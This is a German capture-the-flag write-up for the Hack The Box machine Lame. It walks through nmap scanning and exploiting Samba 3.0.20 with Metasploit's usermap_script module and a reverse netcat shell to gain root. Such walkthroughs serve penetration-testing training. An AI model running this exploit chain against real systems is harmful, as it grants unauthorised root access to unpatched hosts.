← Zurück zu Machines

HTB · published

Lame

Hack The Box CPTS-Roadmap Writeup für Lame: Linux-Service-Enumeration, Samba 3.0.20 usermap_script RCE und Root-Shell.

HTBRoadmap CPTSWriteupLinuxSambadistccdMachine

Metadaten

  • Name: Lame
  • IP Address: 10.129.163.96
  • Plattform: Linux
  • Kategorie: SMB / Samba / RCE
  • Schwierigkeit: Easy
  • Ziel(e): User, Root
  • Kurzbeschreibung: Lame ist eine Easy-Linux-Maschine und war die erste veröffentlichte Maschine auf Hack The Box. Der Weg ist sehr direkt: Enumeration zeigt eine alte Samba-Version 3.0.20-Debian, die über usermap_script ausnutzbar ist. Der Exploit liefert direkt eine Root-Shell.

Reconnaissance / Enumeration

Der initiale Full-Port-Scan zeigte fünf offene TCP-Ports:

PORT     STATE SERVICE
21/tcp   open  ftp
22/tcp   open  ssh
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
3632/tcp open  distccd

Der vollständige Scan-Befehl:

nmap -p- --min-rate 10000 -T4 -v -n -oA nmap/initial-scan 10.129.163.96

Service Scan

Der Service-Scan lieferte mehrere klassische alte Linux-Services:

nmap -sC -sV -vvv -p 21,22,139,445,3632 -oA nmap/service_deep 10.129.163.96
PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         vsftpd 2.3.4
22/tcp   open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X
445/tcp  open  netbios-ssn Samba smbd 3.0.20-Debian
3632/tcp open  distccd     distccd v1 ((GNU) 4.2.4)

Wichtige Beobachtungen:

FTP: Anonymous login allowed
SMB: Samba 3.0.20-Debian
Host: lame
Domain: hackthebox.gr
SMB signing: disabled
SMB2: protocol negotiation failed

Besonders auffällig waren:

  • vsftpd 2.3.4
  • Samba 3.0.20-Debian
  • distccd

Alle drei Services sind auf einer alten Linux-Box einen genaueren Blick wert. In diesem Fall war Samba der direkte Weg.

SMB / Samba Findings

Der relevante Service lief auf Port 139 und 445:

Samba smbd 3.0.20-Debian

Diese Version ist anfällig für die bekannte username map script Command Execution. In Metasploit ist der passende Exploit:

multi/samba/usermap_script

Die Schwachstelle erlaubt Command Execution über speziell präparierte SMB-Login-Daten, wenn username map script unsicher verarbeitet wird.

Exploitation: Samba usermap_script

Das Metasploit-Modul wurde mit dem Zielhost und einem Reverse-Netcat-Payload konfiguriert:

msf exploit(multi/samba/usermap_script) > options
Module options:

Name     Current Setting  Required  Description
----     ---------------  --------  -----------
RHOSTS   10.129.163.96    yes       The target host(s)
RPORT    139              yes       The target port

Payload options:

Name   Current Setting  Required  Description
----   ---------------  --------  -----------
LHOST  10.10.14.118     yes       The listen address
LPORT  4444             yes       The listen port

Ausführung:

msf exploit(multi/samba/usermap_script) > run

Ergebnis:

[*] Started reverse TCP handler on 10.10.14.118:4444
[*] Command shell session 1 opened (10.10.14.118:4444 -> 10.129.163.96:45048)

Die Shell wurde anschließend interaktiv gemacht:

[*] Trying to find binary 'python' on the target machine
[*] Found python at /usr/bin/python
[*] Using `python` to pop up an interactive shell
[*] Trying to find binary 'bash' on the target machine
[*] Found bash at /bin/bash

Der Exploit lieferte direkt Root:

root@lame:/#

Damit waren Foothold und Privilege Escalation in einem Schritt abgeschlossen.

User Flag

Mit Root-Rechten konnte die User-Flag direkt gelesen werden:

cat /home/makis/user.txt

Root Flag

Die Root-Flag lag im Root-Home:

cat /root/root.txt

Post-Exploitation

  • Foothold: Samba RCE über multi/samba/usermap_script.
  • User: Zugriff auf /home/makis/user.txt.
  • Root: Exploit lieferte direkt root@lame.
  • Separate Privilege Escalation: Nicht nötig.
  • Alternative Angriffsflächen: vsftpd 2.3.4 und distccd waren ebenfalls auffällig, wurden aber für den erfolgreichen Weg nicht benötigt.

Lessons Learned

  • Versionsnummern ernst nehmen: Alte Services wie Samba 3.0.20-Debian sind oft der wichtigste Hinweis.
  • Nicht nur Web denken: Lame ist ein gutes Beispiel dafür, dass klassische Netzwerkdienste der direkte Weg sein können.
  • SMB sauber enumerieren: Ports 139 und 445 liefern oft Betriebssystem-, Domain- und Versionshinweise.
  • Metasploit als Validierung: Für bekannte Legacy-Schwachstellen kann Metasploit schnell bestätigen, ob der Weg funktioniert.
  • Ein Exploit kann reichen: Bei Lame führt der Samba-Bug direkt zu Root, ohne separate Privilege-Escalation-Phase.

Notizen

Lame ist als CPTS-Roadmap-Maschine besonders gut, um den Blick für alte Services zu schärfen. Der wichtigste Punkt ist nicht die Komplexität des Exploits, sondern das saubere Erkennen der Angriffsfläche: SMB-Version prüfen, bekannte Schwachstelle zuordnen, kontrolliert ausnutzen.